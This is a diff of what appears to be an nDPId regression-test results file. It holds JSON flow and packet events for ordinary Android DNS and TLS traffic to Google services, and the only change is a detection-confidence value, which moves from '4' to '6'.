00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454871600,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871600,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq\/ZAAEARCVTAqAIQwKgCAeYMADUALTc\/5u4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454871601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871601,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRUPMAAEARpEfAqAIBwKgCEAA15gwAPWHd5u6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454871676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871676,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrABAAEARCUrAqAIQwKgCAYHYADUALeidI0IBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": 
{"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454871677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871677,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRtlYAAEARPuTAqAIBwKgCEAA1gdgAPR0+I0KBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} 
+00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -259,24 +260,24 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1582454871804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871804,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGrB5AAEARCSfAqAIQwKgCAUfLADUAMmcLPGQBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} 
-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1582454871805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871805,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWsEQAAEARRPHAqAIBwKgCEAA1R8sAQmKIPGSBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": 
{"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="} 